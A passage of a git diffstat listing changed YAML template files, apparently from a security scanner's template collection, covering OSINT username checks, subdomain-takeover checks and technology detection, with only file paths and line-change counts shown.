http/osint/extralunchmoney.yaml | 7 +- http/osint/eyeem.yaml | 7 +- http/osint/f3.yaml | 7 +- http/osint/fabswingers.yaml | 7 +- http/osint/facebook-page.yaml | 7 +- http/osint/faktopedia.yaml | 7 +- http/osint/fancentro.yaml | 7 +- http/osint/fandalism.yaml | 7 +- http/osint/fandom.yaml | 7 +- http/osint/fanpop.yaml | 7 +- http/osint/fansly.yaml | 7 +- http/osint/fark.yaml | 7 +- http/osint/farkascity.yaml | 7 +- http/osint/fatsecret.yaml | 7 +- http/osint/fcv.yaml | 7 +- .../federatedpress-mastodon-instance.yaml | 7 +- http/osint/figma.yaml | 7 +- http/osint/filmweb.yaml | 7 +- http/osint/fine-art-america.yaml | 7 +- http/osint/fiverr.yaml | 7 +- http/osint/flickr.yaml | 7 +- http/osint/flipboard.yaml | 5 +- http/osint/flowcode.yaml | 7 +- http/osint/fodors-forum.yaml | 7 +- http/osint/fortnite-tracker.yaml | 7 +- http/osint/forumprawneorg.yaml | 7 +- .../osint/fosstodonorg-mastodon-instance.yaml | 7 +- http/osint/fotka.yaml | 7 +- http/osint/foursquare.yaml | 7 +- http/osint/freelancer.yaml | 7 +- http/osint/freesound.yaml | 7 +- http/osint/friendfinder-x.yaml | 7 +- http/osint/friendfinder.yaml | 7 +- http/osint/friendweb.yaml | 7 +- http/osint/furiffic.yaml | 7 +- http/osint/gab.yaml | 7 +- http/osint/game-debate.yaml | 7 +- http/osint/gamespot.yaml | 7 +- http/osint/garmin-connect.yaml | 7 +- http/osint/geocaching.yaml | 7 +- http/osint/getmonero.yaml | 7 +- http/osint/gettr.yaml | 7 +- http/osint/gfycat.yaml | 7 +- http/osint/gigapan.yaml | 7 +- http/osint/giphy.yaml | 7 +- http/osint/girlfriendsmeet.yaml | 7 +- http/osint/gist.yaml | 8 +- http/osint/gitea.yaml | 7 +- http/osint/gitee.yaml | 7 +- http/osint/giters.yaml | 7 +- http/osint/github.yaml | 7 +- http/osint/gitlab.yaml | 7 +- http/osint/gloriatv.yaml | 7 +- http/osint/gnome-extensions.yaml | 7 +- http/osint/gpoddernet.yaml | 7 +- http/osint/grandprof.yaml | 7 +- .../graphicssocial-mastodon-instance.yaml | 7 +- http/osint/gravatar.yaml | 7 +- http/osint/gumroad.yaml | 7 +- http/osint/hackaday.yaml | 7 +- http/osint/hackenproof.yaml | 3 +- http/osint/hacker-news.yaml | 7 +- http/osint/hackerearth.yaml | 7 +- http/osint/hackernoon.yaml | 7 +- http/osint/hackerone.yaml | 7 +- http/osint/hackerrank.yaml | 7 +- http/osint/hackster.yaml | 7 +- http/osint/hamaha.yaml | 7 +- http/osint/hanime.yaml | 7 +- http/osint/hashnode.yaml | 5 +- .../hcommonssocial-mastodon-instance.yaml | 7 +- http/osint/heylink.yaml | 7 +- http/osint/hiberworld.yaml | 7 +- http/osint/hihello.yaml | 7 +- .../historianssocial-mastodon-instance.yaml | 7 +- http/osint/homedesign3d.yaml | 7 +- .../hometechsocial-mastodon-instance.yaml | 7 +- http/osint/hoobe.yaml | 7 +- .../osint/hostuxsocial-mastodon-instance.yaml | 7 +- http/osint/houzz.yaml | 7 +- http/osint/hubpages.yaml | 7 +- http/osint/hubski.yaml | 7 +- http/osint/hugging-face.yaml | 7 +- http/osint/iconfinder.yaml | 7 +- http/osint/icq-chat.yaml | 7 +- http/osint/ifttt.yaml | 7 +- http/osint/ifunny.yaml | 7 +- http/osint/igromania.yaml | 7 +- http/osint/ilovegrowingmarijuana.yaml | 7 +- http/osint/imagefap.yaml | 7 +- http/osint/imageshack.yaml | 7 +- http/osint/imgbb.yaml | 5 +- http/osint/imgsrcru.yaml | 7 +- http/osint/imgur.yaml | 7 +- http/osint/inaturalist.yaml | 7 +- http/osint/independent-academia.yaml | 7 +- http/osint/inkbunny.yaml | 7 +- http/osint/insanejournal.yaml | 7 +- http/osint/instagram.yaml | 6 +- http/osint/instructables.yaml | 7 +- http/osint/internet-archive-account.yaml | 7 +- http/osint/internet-archive-user-search.yaml | 7 +- http/osint/interpals.yaml | 7 +- http/osint/intigriti.yaml | 3 +- http/osint/ismygirl.yaml | 7 +- http/osint/issuu.yaml | 7 +- http/osint/itchio.yaml | 7 +- http/osint/japandict.yaml | 7 +- http/osint/jbzd.yaml | 7 +- http/osint/jejapl.yaml | 7 +- http/osint/jeuxvideo.yaml | 7 +- http/osint/joe-monster.yaml | 7 +- http/osint/jsfiddle.yaml | 7 +- http/osint/justforfans.yaml | 7 +- http/osint/kaggle.yaml | 7 +- http/osint/karabin.yaml | 7 +- http/osint/keybase.yaml | 7 +- http/osint/kickstarter.yaml | 7 +- http/osint/kik.yaml | 7 +- http/osint/kipin.yaml | 7 +- http/osint/knowyourmeme.yaml | 7 +- http/osint/ko-fi.yaml | 7 +- http/osint/kongregate.yaml | 7 +- http/osint/kotburger.yaml | 7 +- http/osint/kwejkpl.yaml | 7 +- http/osint/librarything.yaml | 7 +- .../osint/libretoothgr-mastodon-instance.yaml | 7 +- http/osint/lichess.yaml | 7 +- http/osint/likeevideo.yaml | 7 +- http/osint/line.yaml | 7 +- http/osint/linktree.yaml | 7 +- http/osint/linuxorgru.yaml | 7 +- http/osint/litmindclub-mastodon-instance.yaml | 7 +- http/osint/livejournal.yaml | 7 +- http/osint/livemasterru.yaml | 7 +- http/osint/lobsters.yaml | 7 +- http/osint/lorsh-mastodon-instance.yaml | 7 +- http/osint/love-ru.yaml | 7 +- http/osint/lowcygierpl.yaml | 7 +- http/osint/maga-chat.yaml | 7 +- http/osint/magabook.yaml | 7 +- http/osint/magix.yaml | 7 +- http/osint/mail-archive.yaml | 1 + http/osint/manyvids.yaml | 7 +- http/osint/mapmytracks.yaml | 7 +- .../mapstodonspace-mastodon-instance.yaml | 7 +- http/osint/maroc-nl.yaml | 7 +- http/osint/marshmallow.yaml | 7 +- http/osint/martech.yaml | 7 +- http/osint/massage-anywhere.yaml | 7 +- http/osint/mastoai.yaml | 7 +- http/osint/mastodon-101010pl.yaml | 7 +- http/osint/mastodon-api.yaml | 7 +- http/osint/mastodon-chaossocial.yaml | 7 +- http/osint/mastodon-climatejusticerocks.yaml | 7 +- http/osint/mastodon-countersocial.yaml | 7 +- http/osint/mastodon-defcon.yaml | 7 +- http/osint/mastodon-eu-voice.yaml | 7 +- http/osint/mastodon-mastodon.yaml | 7 +- http/osint/mastodon-meowsocial.yaml | 7 +- http/osint/mastodon-mstdnio.yaml | 7 +- http/osint/mastodon-polsocial.yaml | 7 +- http/osint/mastodon-rigczclub.yaml | 7 +- http/osint/mastodon-social-tchncs.yaml | 7 +- http/osint/mastodon-tflnetpl.yaml | 7 +- http/osint/mastodon-tootcommunity.yaml | 7 +- .../mastodonbooksnet-mastodon-instance.yaml | 7 +- ...mastodonchasedemdev-mastodon-instance.yaml | 7 +- http/osint/mastodononline.yaml | 7 +- http/osint/mastonyc-mastodon-instance.yaml | 7 +- http/osint/mastown-mastodon-instance.yaml | 7 +- http/osint/mcname-minecraft.yaml | 7 +- http/osint/mcuuid-minecraft.yaml | 7 +- http/osint/mediakits.yaml | 7 +- http/osint/medium.yaml | 7 +- http/osint/medyczkapl.yaml | 7 +- http/osint/meet-me.yaml | 7 +- http/osint/megamodelspl.yaml | 7 +- http/osint/memrise.yaml | 7 +- http/osint/message-me.yaml | 7 +- http/osint/metacritic.yaml | 7 +- http/osint/microsoft-technet-community.yaml | 7 +- http/osint/minds.yaml | 7 +- http/osint/minecraft-list.yaml | 7 +- http/osint/mintme.yaml | 7 +- http/osint/mistrzowie.yaml | 7 +- http/osint/mix.yaml | 7 +- http/osint/mixi.yaml | 7 +- http/osint/mixlr.yaml | 7 +- http/osint/mmorpg.yaml | 7 +- http/osint/mod-db.yaml | 5 +- http/osint/moneysavingexpert.yaml | 7 +- http/osint/motokiller.yaml | 7 +- http/osint/moxfield.yaml | 7 +- http/osint/muck-rack.yaml | 7 +- .../musiciansocial-mastodon-instance.yaml | 7 +- http/osint/musictraveler.yaml | 7 +- http/osint/my-instants.yaml | 7 +- http/osint/myanimelist.yaml | 7 +- http/osint/mybuildercom.yaml | 7 +- http/osint/myfitnesspal-author.yaml | 7 +- http/osint/myfitnesspal-community.yaml | 7 +- http/osint/mylot.yaml | 7 +- http/osint/mymfans.yaml | 7 +- http/osint/myportfolio.yaml | 7 +- http/osint/myspace.yaml | 7 +- http/osint/myspreadshop.yaml | 7 +- http/osint/naija-planet.yaml | 7 +- http/osint/nairaland.yaml | 7 +- http/osint/naturalnews.yaml | 7 +- http/osint/naver.yaml | 7 +- http/osint/netvibes.yaml | 7 +- http/osint/newgrounds.yaml | 7 +- http/osint/newmeet.yaml | 7 +- http/osint/nihbuatjajan.yaml | 7 +- http/osint/nitecrew-mastodon-instance.yaml | 7 +- http/osint/nnru.yaml | 7 +- http/osint/notabug.yaml | 7 +- http/osint/note.yaml | 7 +- http/osint/npmjs.yaml | 5 +- http/osint/oglaszamy24hpl.yaml | 7 +- http/osint/ogugg.yaml | 7 +- http/osint/okidoki.yaml | 7 +- http/osint/okru.yaml | 7 +- http/osint/olx.yaml | 7 +- http/osint/omlet.yaml | 7 +- http/osint/opencollective.yaml | 7 +- http/osint/opensource.yaml | 7 +- http/osint/openstreetmap.yaml | 7 +- http/osint/opgg.yaml | 7 +- http/osint/orbys.yaml | 7 +- http/osint/osu.yaml | 7 +- http/osint/our-freedom-book.yaml | 7 +- http/osint/owly.yaml | 7 +- http/osint/palnet.yaml | 7 +- http/osint/parler-archived-posts.yaml | 7 +- http/osint/parler-archived-profile.yaml | 7 +- http/osint/parler.yaml | 7 +- http/osint/pastebin.yaml | 7 +- http/osint/patch.yaml | 7 +- http/osint/patientslikeme.yaml | 7 +- http/osint/patreon.yaml | 7 +- http/osint/patriots-win.yaml | 7 +- http/osint/patronite.yaml | 7 +- http/osint/paypal.yaml | 7 +- http/osint/pcgamer.yaml | 7 +- http/osint/pcpartpicker.yaml | 7 +- http/osint/peing.yaml | 7 +- http/osint/periscope.yaml | 7 +- .../osint/pettingzooco-mastodon-instance.yaml | 7 +- http/osint/pewex.yaml | 7 +- http/osint/picsart.yaml | 7 +- http/osint/piekielni.yaml | 7 +- http/osint/pikabu.yaml | 7 +- http/osint/pillowfort.yaml | 7 +- http/osint/pinkbike.yaml | 7 +- http/osint/pinterest.yaml | 7 +- http/osint/pixelfedsocial.yaml | 7 +- http/osint/platzi.yaml | 6 +- http/osint/playstation-network.yaml | 7 +- http/osint/plurk.yaml | 7 +- http/osint/pokec.yaml | 7 +- http/osint/pokemonshowdown.yaml | 7 +- http/osint/pokerstrategy.yaml | 7 +- http/osint/polchatpl.yaml | 7 +- http/osint/policja2009.yaml | 7 +- http/osint/poll-everywhere.yaml | 7 +- http/osint/polygon.yaml | 7 +- http/osint/polywork.yaml | 6 +- http/osint/popl.yaml | 7 +- http/osint/pornhub-porn-stars.yaml | 7 +- http/osint/pornhub-users.yaml | 7 +- http/osint/poshmark.yaml | 7 +- http/osint/postcrossing.yaml | 7 +- http/osint/postnews.yaml | 5 +- .../poweredbygaysocial-mastodon-instance.yaml | 7 +- http/osint/producthunt.yaml | 7 +- http/osint/promodj.yaml | 7 +- http/osint/pronounspage.yaml | 7 +- http/osint/pronouny.yaml | 7 +- http/osint/prose.yaml | 7 +- http/osint/prvpl.yaml | 7 +- http/osint/psstaudio.yaml | 7 +- http/osint/public.yaml | 7 +- http/osint/pypi.yaml | 7 +- http/osint/queer.yaml | 7 +- http/osint/quitterpl.yaml | 7 +- http/osint/quora.yaml | 7 +- http/osint/raddleme.yaml | 7 +- http/osint/rantli.yaml | 7 +- http/osint/reblogme.yaml | 7 +- http/osint/redbubble.yaml | 5 +- http/osint/reddit.yaml | 7 +- http/osint/redgifs.yaml | 7 +- http/osint/refsheet.yaml | 7 +- http/osint/researchgate.yaml | 7 +- http/osint/resumes-actorsaccess.yaml | 7 +- http/osint/revolut.yaml | 7 +- http/osint/riskru.yaml | 7 +- http/osint/roblox.yaml | 7 +- http/osint/rsi.yaml | 7 +- http/osint/ru-123rf.yaml | 7 +- http/osint/rubygems.yaml | 7 +- http/osint/rumblechannel.yaml | 7 +- http/osint/rumbleuser.yaml | 7 +- http/osint/salon24.yaml | 7 +- http/osint/saracartershow.yaml | 7 +- http/osint/scoutwiki.yaml | 7 +- http/osint/scratch.yaml | 7 +- http/osint/secure-donation.yaml | 7 +- http/osint/seneporno.yaml | 7 +- http/osint/sentimente.yaml | 7 +- http/osint/seoclerks.yaml | 7 +- http/osint/setlistfm.yaml | 7 +- http/osint/sexworker.yaml | 7 +- http/osint/sfd.yaml | 7 +- http/osint/shanii-writes.yaml | 7 +- http/osint/shesfreaky.yaml | 7 +- http/osint/shopify.yaml | 7 +- http/osint/shutterstock.yaml | 7 +- http/osint/skeb.yaml | 7 +- http/osint/skillshare.yaml | 5 +- http/osint/skyrock.yaml | 7 +- http/osint/slackholes.yaml | 7 +- http/osint/slant.yaml | 7 +- http/osint/slides.yaml | 7 +- http/osint/slideshare.yaml | 7 +- http/osint/smashrun.yaml | 7 +- http/osint/smelsy.yaml | 7 +- http/osint/smugmug.yaml | 7 +- http/osint/smule.yaml | 7 +- http/osint/snapchat-stories.yaml | 7 +- http/osint/snapchat.yaml | 7 +- http/osint/snipfeed.yaml | 7 +- http/osint/soccitizen4eu.yaml | 7 +- http/osint/social-msdn.yaml | 7 +- http/osint/socialbundde.yaml | 7 +- http/osint/sofurry.yaml | 7 +- http/osint/solikick.yaml | 7 +- http/osint/soloby.yaml | 7 +- http/osint/soloto.yaml | 7 +- http/osint/soundcloud.yaml | 7 +- http/osint/soup.yaml | 7 +- http/osint/sourceforge.yaml | 7 +- http/osint/speaker-deck.yaml | 7 +- http/osint/speedrun.yaml | 7 +- http/osint/spiceworks.yaml | 7 +- http/osint/sporcle.yaml | 7 +- http/osint/spotify.yaml | 7 +- http/osint/stackoverflow.yaml | 3 +- http/osint/steam.yaml | 7 +- http/osint/steemit.yaml | 7 +- http/osint/steller.yaml | 7 +- .../stonerssocial-mastodon-instance.yaml | 7 +- http/osint/storycorps.yaml | 7 +- http/osint/streamelements.yaml | 7 +- http/osint/streamlabs.yaml | 7 +- http/osint/stripchat.yaml | 7 +- http/osint/subscribestar.yaml | 7 +- http/osint/sukebeinyaasi.yaml | 7 +- http/osint/suzuri.yaml | 7 +- http/osint/szmerinfo.yaml | 7 +- http/osint/tabletoptournament.yaml | 7 +- http/osint/tagged.yaml | 7 +- http/osint/tamtam.yaml | 7 +- http/osint/tanukipl.yaml | 7 +- http/osint/tapitag.yaml | 7 +- http/osint/tappy.yaml | 7 +- http/osint/taringa.yaml | 7 +- http/osint/taskrabbit.yaml | 7 +- http/osint/teamtreehouse.yaml | 7 +- http/osint/teddygirls.yaml | 7 +- http/osint/teespring.yaml | 7 +- http/osint/teknik.yaml | 7 +- http/osint/telegram.yaml | 7 +- http/osint/tellonym.yaml | 7 +- http/osint/tenor.yaml | 7 +- http/osint/tf2-backpack-examiner.yaml | 7 +- http/osint/thegatewaypundit.yaml | 7 +- http/osint/theguardian.yaml | 7 +- http/osint/themeforest.yaml | 7 +- http/osint/thetattooforum.yaml | 7 +- http/osint/threads.yaml | 7 +- http/osint/tiktok.yaml | 7 +- http/osint/tildezone-mastodon-instance.yaml | 7 +- http/osint/tinder.yaml | 7 +- http/osint/tmdb.yaml | 5 +- http/osint/tootingch-mastodon-instance.yaml | 7 +- http/osint/totalwar.yaml | 7 +- http/osint/toyhouse.yaml | 7 +- http/osint/trackmanialadder.yaml | 7 +- http/osint/tradingview.yaml | 7 +- http/osint/trakt.yaml | 7 +- http/osint/trello.yaml | 7 +- http/osint/tripadvisor.yaml | 7 +- http/osint/truth-social.yaml | 7 +- http/osint/tryhackme.yaml | 5 +- http/osint/tumblr.yaml | 7 +- http/osint/tunefind.yaml | 7 +- http/osint/twitcasting.yaml | 7 +- http/osint/twitch.yaml | 7 +- http/osint/twitter-archived-profile.yaml | 7 +- http/osint/twitter-archived-tweets.yaml | 7 +- http/osint/twitter.yaml | 7 +- http/osint/twpro.yaml | 7 +- http/osint/ubisoft.yaml | 7 +- http/osint/udemy.yaml | 7 +- http/osint/uefconnect.yaml | 7 +- http/osint/uid.yaml | 7 +- .../uiuxdevsocial-mastodon-instance.yaml | 7 +- http/osint/ultras-diary.yaml | 7 +- http/osint/ulubpl.yaml | 7 +- http/osint/unsplash.yaml | 7 +- http/osint/untappd.yaml | 7 +- http/osint/usa-life.yaml | 7 +- http/osint/utipio.yaml | 7 +- http/osint/uwuai.yaml | 7 +- http/osint/uwumarket.yaml | 7 +- http/osint/vampr.yaml | 2 +- http/osint/venmo.yaml | 7 +- http/osint/vero.yaml | 7 +- http/osint/vibilagare.yaml | 7 +- http/osint/viddler.yaml | 7 +- http/osint/vimeo.yaml | 7 +- http/osint/vine.yaml | 7 +- http/osint/vip-blog.yaml | 7 +- http/osint/virustotal.yaml | 7 +- http/osint/visnesscard.yaml | 7 +- http/osint/vivino.yaml | 7 +- http/osint/vk.yaml | 7 +- http/osint/vklworld-mastodon-instance.yaml | 7 +- http/osint/vmstio-mastodon-instance.yaml | 7 +- http/osint/voice123.yaml | 7 +- http/osint/voicescom.yaml | 7 +- http/osint/vsco.yaml | 7 +- http/osint/wanelo.yaml | 7 +- http/osint/warriorforum.yaml | 7 +- http/osint/watchmemorecom.yaml | 7 +- http/osint/watchmyfeed.yaml | 7 +- http/osint/wattpad.yaml | 7 +- http/osint/weasyl.yaml | 7 +- http/osint/weebly.yaml | 7 +- http/osint/wego.yaml | 7 +- http/osint/weheartit.yaml | 7 +- http/osint/weibo.yaml | 7 +- http/osint/wetransfer.yaml | 7 +- http/osint/wikidot.yaml | 7 +- http/osint/wikipedia.yaml | 7 +- http/osint/wimkin-publicprofile.yaml | 7 +- http/osint/wireclub.yaml | 7 +- http/osint/wishlistr.yaml | 7 +- http/osint/wolni-slowianie.yaml | 7 +- http/osint/wordnik.yaml | 7 +- http/osint/wordpress-support.yaml | 7 +- http/osint/wordpress.yaml | 7 +- http/osint/wowhead.yaml | 7 +- http/osint/wykop.yaml | 7 +- http/osint/xanga.yaml | 7 +- http/osint/xbox-gamertag.yaml | 7 +- http/osint/xhamster.yaml | 7 +- http/osint/xing.yaml | 7 +- http/osint/xvideos-models.yaml | 7 +- http/osint/xvideos-profiles.yaml | 7 +- http/osint/yahoo-japan-auction.yaml | 7 +- http/osint/yapishu.yaml | 7 +- http/osint/yazawaj.yaml | 7 +- http/osint/yelp.yaml | 7 +- http/osint/yeswehack.yaml | 3 +- http/osint/youpic.yaml | 7 +- http/osint/youtube.yaml | 7 +- http/osint/zatrybipl.yaml | 7 +- http/osint/zbiornik.yaml | 7 +- http/osint/zhihu.yaml | 7 +- http/osint/zillow.yaml | 7 +- http/osint/zmarsacom.yaml | 7 +- http/osint/zomato.yaml | 7 +- http/osint/zoomitir.yaml | 7 +- http/takeovers/aftership-takeover.yaml | 4 +- http/takeovers/agilecrm-takeover.yaml | 4 +- http/takeovers/aha-takeover.yaml | 4 +- http/takeovers/airee-takeover.yaml | 2 +- http/takeovers/anima-takeover.yaml | 2 +- http/takeovers/announcekit-takeover.yaml | 2 +- http/takeovers/aws-bucket-takeover.yaml | 2 +- http/takeovers/bigcartel-takeover.yaml | 2 +- http/takeovers/bitbucket-takeover.yaml | 4 +- http/takeovers/campaignmonitor-takeover.yaml | 2 +- http/takeovers/canny-takeover.yaml | 2 +- http/takeovers/cargo-takeover.yaml | 4 +- http/takeovers/cargocollective-takeover.yaml | 2 +- http/takeovers/flexbe-takeover.yaml | 2 +- http/takeovers/flywheel-takeover.yaml | 4 +- http/takeovers/frontify-takeover.yaml | 2 +- http/takeovers/gemfury-takeover.yaml | 1 + http/takeovers/getresponse-takeover.yaml | 2 +- http/takeovers/ghost-takeover.yaml | 2 +- http/takeovers/gitbook-takeover.yaml | 2 +- http/takeovers/github-takeover.yaml | 2 +- http/takeovers/hatenablog-takeover.yaml | 2 +- http/takeovers/helpjuice-takeover.yaml | 4 +- http/takeovers/helprace-takeover.yaml | 2 +- http/takeovers/helpscout-takeover.yaml | 4 +- http/takeovers/hubspot-takeover.yaml | 2 +- http/takeovers/intercom-takeover.yaml | 2 +- http/takeovers/jazzhr-takeover.yaml | 4 +- http/takeovers/jetbrains-takeover.yaml | 2 +- http/takeovers/kinsta-takeover.yaml | 4 +- http/takeovers/launchrock-takeover.yaml | 2 +- http/takeovers/leadpages-takeover.yaml | 2 +- http/takeovers/mashery-takeover.yaml | 2 +- http/takeovers/meteor-takeover.yaml | 2 +- http/takeovers/netlify-takeover.yaml | 2 +- http/takeovers/ngrok-takeover.yaml | 2 +- http/takeovers/pagewiz-takeover.yaml | 2 +- http/takeovers/pantheon-takeover.yaml | 4 +- http/takeovers/pingdom-takeover.yaml | 2 +- http/takeovers/proposify-takeover.yaml | 4 +- http/takeovers/readme-takeover.yaml | 2 +- http/takeovers/readthedocs-takeover.yaml | 2 +- http/takeovers/shopify-takeover.yaml | 2 +- http/takeovers/short-io.yaml | 2 +- http/takeovers/simplebooklet-takeover.yaml | 4 +- http/takeovers/smartjob-takeover.yaml | 2 +- http/takeovers/smugmug-takeover.yaml | 2 +- http/takeovers/sprintful-takeover.yaml | 2 +- http/takeovers/strikingly-takeover.yaml | 2 +- http/takeovers/surge-takeover.yaml | 4 +- http/takeovers/surveygizmo-takeover.yaml | 4 +- http/takeovers/surveysparrow-takeover.yaml | 4 +- http/takeovers/tave-takeover.yaml | 4 +- http/takeovers/teamwork-takeover.yaml | 2 +- http/takeovers/tilda-takeover.yaml | 4 +- http/takeovers/tumblr-takeover.yaml | 2 +- http/takeovers/uberflip-takeover.yaml | 2 +- http/takeovers/uptimerobot-takeover.yaml | 2 +- http/takeovers/uservoice-takeover.yaml | 2 +- http/takeovers/vend-takeover.yaml | 4 +- http/takeovers/vercel-takeover.yaml | 2 +- http/takeovers/webflow-takeover.yaml | 2 +- http/takeovers/wishpond-takeover.yaml | 2 +- http/takeovers/wix-takeover.yaml | 4 +- http/takeovers/wordpress-takeover.yaml | 2 +- http/takeovers/worksites-takeover.yaml | 2 +- http/takeovers/zendesk-takeover.yaml | 2 +- http/technologies/acontent-detect.yaml | 5 +- http/technologies/activecollab-detect.yaml | 1 + http/technologies/adfs-detect.yaml | 2 +- .../adobe/adobe-coldfusion-detect.yaml | 2 +- .../adobe/adobe-coldfusion-error-detect.yaml | 2 +- http/technologies/aem-cms.yaml | 2 +- http/technologies/aem-detect.yaml | 1 - http/technologies/aerocms-detect.yaml | 4 +- http/technologies/airtame-device-detect.yaml | 2 +- http/technologies/akamai-cache-detect.yaml | 6 +- http/technologies/akamai-detect.yaml | 5 +- .../ambassador-edge-stack-detect.yaml | 2 +- http/technologies/angular-detect.yaml | 3 +- http/technologies/ansible-awx-detect.yaml | 2 +- http/technologies/apache/airflow-detect.yaml | 5 +- .../apache/apache-axis-detect.yaml | 3 +- .../apache/apache-cocoon-detect.yaml | 2 +- http/technologies/apache/apache-detect.yaml | 3 +- .../technologies/apache/apache-guacamole.yaml | 2 +- .../apache/apache-karaf-panel.yaml | 2 +- .../apache/default-apache-test-all.yaml | 4 +- .../apache/default-apache2-ubuntu-page.yaml | 1 + .../apache/kafka-manager-panel.yaml | 4 +- .../technologies/apache/ranger-detection.yaml | 5 +- http/technologies/apache/tomcat-detect.yaml | 5 +- http/technologies/apollo-server-detect.yaml | 4 +- http/technologies/apple-httpserver.yaml | 4 +- http/technologies/aqua-enterprise-detect.yaml | 2 +- .../technologies/artica-web-proxy-detect.yaml | 4 +- http/technologies/avideo-detect.yaml | 3 +- .../aws-elastic-beanstalk-detect.yaml | 2 +- http/technologies/aws/amazon-ec2-detect.yaml | 2 +- http/technologies/aws/aws-bucket-service.yaml | 2 +- .../aws/aws-cloudfront-service.yaml | 2 +- .../azure-kubernetes-service.yaml | 2 +- http/technologies/b2b-builder-detect.yaml | 1 + http/technologies/basic-auth-detect.yaml | 2 +- http/technologies/besu-server-detect.yaml | 4 +- .../bigip-config-utility-detect.yaml | 6 +- http/technologies/bigip-detect.yaml | 2 +- .../blazor-webassembly-detect.yaml | 3 +- http/technologies/burp-api-detect.yaml | 4 +- .../burp-collaborator-detect.yaml | 4 +- http/technologies/carestream-vue-detect.yaml | 5 +- http/technologies/casaos-detection.yaml | 4 +- http/technologies/catalog-creator-detect.yaml | 5 +- .../checkpoint-mobile-detect.yaml | 2 +- http/technologies/citrix-hypervisor-page.yaml | 4 +- .../technologies/cloudflare-nginx-detect.yaml | 2 +- http/technologies/cloudfoundry-detect.yaml | 4 +- http/technologies/cobbler-version.yaml | 14 +- http/technologies/cockpit-detect.yaml | 3 +- .../technologies/coming-soon-page-detect.yaml | 2 +- http/technologies/confluence-detect.yaml | 7 +- .../connectwise-control-detect.yaml | 2 +- http/technologies/craft-cms-detect.yaml | 2 +- http/technologies/csrfguard-detect.yaml | 8 +- http/technologies/cvsweb-detect.yaml | 3 +- http/technologies/dash-panel-detect.yaml | 3 +- http/technologies/dedecms-detect.yaml | 3 +- http/technologies/default-amazon-cognito.yaml | 2 +- http/technologies/default-apache-miracle.yaml | 4 +- http/technologies/default-apache-shiro.yaml | 2 +- http/technologies/default-cakephp-page.yaml | 2 +- http/technologies/default-detect-generic.yaml | 5 +- http/technologies/default-jetty-page.yaml | 1 + http/technologies/default-lighttpd-page.yaml | 1 + http/technologies/default-lucee-page.yaml | 1 + http/technologies/default-movable-page.yaml | 1 + .../default-page-azure-container.yaml | 2 +- .../technologies/default-parallels-plesk.yaml | 2 +- http/technologies/default-runcloud-page.yaml | 2 +- http/technologies/default-sitecore-page.yaml | 2 +- http/technologies/default-symfony-page.yaml | 4 +- http/technologies/default-tengine-page.yaml | 4 +- .../default-websphere-liberty.yaml | 2 +- .../technologies/dell/dell-idrac6-detect.yaml | 3 +- .../technologies/dell/dell-idrac7-detect.yaml | 3 +- .../technologies/dell/dell-idrac8-detect.yaml | 3 +- .../technologies/dell/dell-idrac9-detect.yaml | 4 +- http/technologies/detect-sentry.yaml | 2 +- http/technologies/devexpress-detect.yaml | 2 +- http/technologies/dreambox-detect.yaml | 2 +- http/technologies/drupal-detect.yaml | 4 +- http/technologies/dwr-index-detect.yaml | 3 +- http/technologies/ecology-detect.yaml | 2 +- http/technologies/eg-manager-detect.yaml | 3 +- http/technologies/elfinder-detect.yaml | 8 +- http/technologies/elfinder-version.yaml | 4 +- http/technologies/emqx-detect.yaml | 2 +- http/technologies/erigon-server-detect.yaml | 2 +- http/technologies/express-default-page.yaml | 2 +- http/technologies/eyesofnetwork-detect.yaml | 2 +- http/technologies/fanruanoa-detect.yaml | 7 +- http/technologies/fanruanoa2012-detect.yaml | 5 +- http/technologies/fastjson-version.yaml | 4 +- http/technologies/favicon-detect.yaml | 1 - .../fingerprinthub-web-fingerprints.yaml | 153 +- http/technologies/froxlor-detect.yaml | 3 +- http/technologies/geo-webserver-detect.yaml | 4 +- http/technologies/geth-server-detect.yaml | 4 +- http/technologies/getsimple-cms-detect.yaml | 5 +- http/technologies/gilacms-detect.yaml | 3 +- http/technologies/gitbook-detect.yaml | 2 +- http/technologies/gitea-detect.yaml | 4 +- http/technologies/glpi-status-page.yaml | 2 +- http/technologies/gnuboard-detect.yaml | 4 +- http/technologies/goliath-detect.yaml | 2 +- .../google-frontend-httpserver.yaml | 2 +- .../google/cloud-run-default-page.yaml | 2 +- http/technologies/google/firebase-detect.yaml | 2 +- http/technologies/google/firebase-urls.yaml | 2 +- .../google/google-bucket-service.yaml | 2 +- http/technologies/google/google-storage.yaml | 3 +- http/technologies/graphiql-detect.yaml | 4 +- http/technologies/graphql-detect.yaml | 4 +- http/technologies/grav-cms-detect.yaml | 5 +- http/technologies/graylog-api-browser.yaml | 2 +- .../graylog/graylog-api-exposure.yaml | 3 +- http/technologies/gunicorn-detect.yaml | 3 +- http/technologies/hanwang-detect.yaml | 3 +- http/technologies/harbor-detect.yaml | 2 +- .../hashicorp-boundary-detect.yaml | 2 +- http/technologies/hashicorp-vault-detect.yaml | 4 +- http/technologies/herokuapp-detect.yaml | 2 +- http/technologies/hetzner-cloud-detect.yaml | 2 +- http/technologies/hikvision-detect.yaml | 5 +- http/technologies/honeypot-detect.yaml | 1 - http/technologies/hp-blade-admin-detect.yaml | 2 +- http/technologies/hugo-detect.yaml | 3 +- .../technologies/ibm/ibm-sterling-detect.yaml | 3 +- .../icecast-mediaserver-detect.yaml | 4 +- http/technologies/icecast-server-detect.yaml | 2 +- http/technologies/ilo-detect.yaml | 2 +- http/technologies/impresscms-detect.yaml | 2 +- .../technologies/influxdb-version-detect.yaml | 4 +- http/technologies/interactsh-server.yaml | 2 +- http/technologies/intercom.yaml | 4 +- http/technologies/ispyconnect-detect.yaml | 2 +- http/technologies/jboss-detect.yaml | 2 +- http/technologies/jeecg-boot-detect.yaml | 1 + http/technologies/jellyfin-detect.yaml | 3 +- http/technologies/jenkins-detect.yaml | 3 +- http/technologies/jhipster-detect.yaml | 2 +- http/technologies/jira-detect.yaml | 4 +- http/technologies/jira-serverinfo.yaml | 2 +- http/technologies/jolokia-detect.yaml | 2 +- http/technologies/joomla-detect.yaml | 2 +- http/technologies/jsf-detect.yaml | 3 +- http/technologies/json-server.yaml | 2 +- http/technologies/jspxcms-detect.yaml | 2 +- .../kingsoft-webserver-detect.yaml | 2 +- http/technologies/kong-detect.yaml | 2 +- .../kubernetes-operational-view-detect.yaml | 2 +- .../kubernetes/etcd/etcd-version.yaml | 2 +- .../kube-api/kube-api-deployments.yaml | 4 +- .../kube-api/kube-api-namespaces.yaml | 4 +- .../kubernetes/kube-api/kube-api-nodes.yaml | 2 +- .../kubernetes/kube-api/kube-api-pods.yaml | 4 +- 